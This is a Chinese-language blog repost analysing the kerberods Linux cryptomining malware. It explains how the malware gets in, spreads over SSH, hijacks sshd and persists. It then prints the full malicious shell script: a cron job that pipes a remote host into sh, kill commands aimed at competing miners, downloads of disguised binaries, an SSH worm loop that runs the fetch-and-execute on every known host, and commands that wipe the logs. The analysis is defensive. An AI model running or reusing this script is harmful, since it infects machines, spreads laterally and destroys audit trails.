随笔-366  评论-37  文章-0  trackbacks-0
https://www.cnblogs.com/kobexffx/archive/2019/06/14/11000337.html 三、病毒分析 1、感染路径 攻击者通过网络进入第一台被感染的机器(redis未认证漏洞、ssh密码暴力破解登录等)。 第一台感染的机器会读取known_hosts文件,遍历ssh登录,如果是做了免密登录认证,则将直接进行横向传播。 2、病毒主要模块 主恶意程序:kerberods 恶意Hook库:libcryptod.so libcryptod.c 挖矿程序:khugepageds 恶意脚本文件:netdns (用作kerberods的启停等管理) 恶意程序:sshd (劫持sshd服务,每次登陆均可拉起病毒进程) 3、执行顺序   ① 执行恶意脚本下载命令 ② 主进程操作 1> 添加至开机启动,以及/etc/bashrc 2> 生成了sshd文件 劫持sshd服务 3> 将netdns文件设置为开机启动 4> 编译libcryptod.c为/usr/local/lib/libcryptod.so 5> 预加载动态链接库,恶意hook关键系统操作函数 6> 修改/etc/cron.d/root文件,增加定时任务 7> 拉起khugepageds挖矿进程 附病毒恶意进程代码 复制代码 1 export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin 2 3 mkdir -p /tmp 4 chmod 1777 /tmp 5 6 echo "* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh" | crontab - 7 8 ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9 10 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9 11 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9 12 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9 13 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 14 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9 15 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9 16 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9 17 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9 18 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9 19 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9 20 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9 21 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9 22 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9 23 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9 24 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9 25 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9 26 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9 27 ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -9 28 ps -ef|grep -v grep|grep "axgtbc"|awk '{print $2}'|xargs kill -9 29 ps -ef|grep -v grep|grep "axgtfa"|awk '{print $2}'|xargs kill -9 30 ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9 31 ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9 32 ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9 33 34 cd /tmp 35 touch /usr/local/bin/writeable && cd /usr/local/bin/ 36 touch /usr/libexec/writeable && cd /usr/libexec/ 37 touch /usr/bin/writeable && cd /usr/bin/ 38 rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable 39 export PATH=$PATH:$(pwd) 40 if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then 41 chattr -i sshd 42 rm -rf sshd 43 ARCH=$(uname -m) 44 if [ ${ARCH}x = "x86_64x" ]; then 45 (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -O sshd) && chmod +x sshd 46 else 47 (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -o sshd||wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -o sshd||wget --timeout=30 --tries=3 -q res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -O sshd||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -o sshd||wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -O sshd) && chmod +x sshd 48 fi 49 $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshd 50 fi 51 52 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then 53 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done 54 fi 55 56 for file in /home/* 57 do 58 if test -d $file 59 then 60 if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then 61 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done 62 fi 63 fi 64 done 65 66 echo 0>/var/spool/mail/root 67 echo 0>/var/log/wtmp 68 echo 0>/var/log/secure 69 echo 0>/var/log/cron 70 #
posted on 2019-11-13 11:33 小王 阅读(293) 评论(0)  编辑 收藏 引用 所属分类: linux

只有注册用户登录后才能发表评论。
网站导航: 博客园   IT新闻   BlogJava   知识库   博问   管理